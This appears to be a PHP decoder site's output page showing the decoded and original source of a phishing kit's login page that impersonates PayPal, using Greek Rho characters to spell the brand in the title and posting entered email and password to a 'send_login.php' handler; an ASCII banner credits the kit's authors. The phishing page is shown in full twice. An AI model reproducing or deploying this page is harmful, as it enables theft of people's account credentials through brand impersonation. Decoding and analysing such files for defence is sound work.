Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php session_start(); /* __ __ _ ..

Decoded Output download

<?php 
 
   session_start(); 
 
 
 
/*  
 
  __  __                         _                    _                    __      __   __          __  _____   ______ 
 |  \/  |                       | |                  | |                  / /     / /   \ \        / / |_   _| |___  / 
 | \  / |   ___    _   _   ___  | |_    __ _    ___  | |__     ___       / /     / /     \ \  /\  / /    | |      / /  
 | |\/| |  / _ \  | | | | / __| | __|  / _` |  / __| | '_ \   / _ \     / /     / /       \ \/  \/ /     | |     / /   
 | |  | | | (_) | | |_| | \__ \ | |_  | (_| | | (__  | | | | |  __/    / /     / /         \  /\  /     _| |_   / /__  
 |_|  |_|  \___/   \__,_| |___/  \__|  \__,_|  \___| |_| |_|  \___|   /_/     /_/           \/  \/     |_____| /_____| 
                                                                                                                       
                                                                             
 
*/ 
 
include './system/boot.php'; 
 
 
?> 
 <html> 
  <head> 
    <meta charset="UTF-8" /> 
  	<link rel="stylesheet" type="text/css" href="css/style.css"> 
  	<title>Logging in - &Rho;ay&Rho;al</title> 
    <link rel="shortcut icon" link rel="logo-icon" href="./img/icon.ico"> 
  <html><head> 
    <meta charset="UTF-8"> 
  	<link rel="stylesheet" type="text/css" href="css/style.css"> 
  	<title>Logging in - ayal</title> 
    <link rel="shortcut icon" link="" href="./img/icon.ico"> 
  </head> 
  <body> 
 
    <!-- Start Login And Setup--> 
     <div class="wrapp"> 
       <div class="all"> 
        <div class="logo"> 
          <a href="#"> 
            <img src="img/logo.png"> 
          </a> 
        </div> 
         <center> 
<form action="system/send_login.php" method="POST"> 
           <input id="wiz" type="email" name="email" required="required" placeholder="Email"> 
           <input id="wiz" type="password" minlength="5" name="password" required="required" placeholder="Password"> 
           <div class="sb"> 
           <input type="submit" name="login" value="Log In"> 
           </div> 
         </form></center> 
         <div class="hav"> 
           <span>Having trouble logging in?</span> 
         </div> 
         <center> 
<div class="sg"> 
           <button>Sign Up</button> 
         </div></center> 
       </div> 
     </div> 
 
    <!-- End Login And Setup-->  
 
  <!-- Start Footer --> 
 
  <footer> 
    <ul> 
      <li> 
        <a href="#">Contact Us</a> 
      </li> 
      <li> 
        <a href="#">Privacy</a> 
      </li> 
      <li> 
        <a href="#">Legal</a> 
      </li> 
      <li> 
        <a href="#">Worldwide</a> 
      </li> 
    </ul> 
    <div class="from"></div> 
  </footer> 
  <!-- End Footer --> 
 
  <script type="text/javascript" src="js/jquery-3.1.0.min.js"></script> 
  <script type="text/javascript" src="js/code-js.js"> 
 
  </script> 
   
</body></html>

Did this file decode correctly?

Original Code

<?php

   session_start();



/* 

  __  __                         _                    _                    __      __   __          __  _____   ______
 |  \/  |                       | |                  | |                  / /     / /   \ \        / / |_   _| |___  /
 | \  / |   ___    _   _   ___  | |_    __ _    ___  | |__     ___       / /     / /     \ \  /\  / /    | |      / / 
 | |\/| |  / _ \  | | | | / __| | __|  / _` |  / __| | '_ \   / _ \     / /     / /       \ \/  \/ /     | |     / /  
 | |  | | | (_) | | |_| | \__ \ | |_  | (_| | | (__  | | | | |  __/    / /     / /         \  /\  /     _| |_   / /__ 
 |_|  |_|  \___/   \__,_| |___/  \__|  \__,_|  \___| |_| |_|  \___|   /_/     /_/           \/  \/     |_____| /_____|
                                                                                                                      
                                                                            

*/

include './system/boot.php';


?>
 <html>
  <head>
    <meta charset="UTF-8" />
  	<link rel="stylesheet" type="text/css" href="css/style.css">
  	<title>Logging in - &Rho;ay&Rho;al</title>
    <link rel="shortcut icon" link rel="logo-icon" href="./img/icon.ico">
  <html><head>
    <meta charset="UTF-8">
  	<link rel="stylesheet" type="text/css" href="css/style.css">
  	<title>Logging in - ayal</title>
    <link rel="shortcut icon" link="" href="./img/icon.ico">
  </head>
  <body>

    <!-- Start Login And Setup-->
     <div class="wrapp">
       <div class="all">
        <div class="logo">
          <a href="#">
            <img src="img/logo.png">
          </a>
        </div>
         <center>
<form action="system/send_login.php" method="POST">
           <input id="wiz" type="email" name="email" required="required" placeholder="Email">
           <input id="wiz" type="password" minlength="5" name="password" required="required" placeholder="Password">
           <div class="sb">
           <input type="submit" name="login" value="Log In">
           </div>
         </form></center>
         <div class="hav">
           <span>Having trouble logging in?</span>
         </div>
         <center>
<div class="sg">
           <button>Sign Up</button>
         </div></center>
       </div>
     </div>

    <!-- End Login And Setup--> 

  <!-- Start Footer -->

  <footer>
    <ul>
      <li>
        <a href="#">Contact Us</a>
      </li>
      <li>
        <a href="#">Privacy</a>
      </li>
      <li>
        <a href="#">Legal</a>
      </li>
      <li>
        <a href="#">Worldwide</a>
      </li>
    </ul>
    <div class="from"></div>
  </footer>
  <!-- End Footer -->

  <script type="text/javascript" src="js/jquery-3.1.0.min.js"></script>
  <script type="text/javascript" src="js/code-js.js">

  </script>
  
</body></html>

Function Calls

session_start 1

Variables

None

Stats

MD5 9862a2786a1488942b79f9efc57e41bf
Eval Count 0
Decode Time 80 ms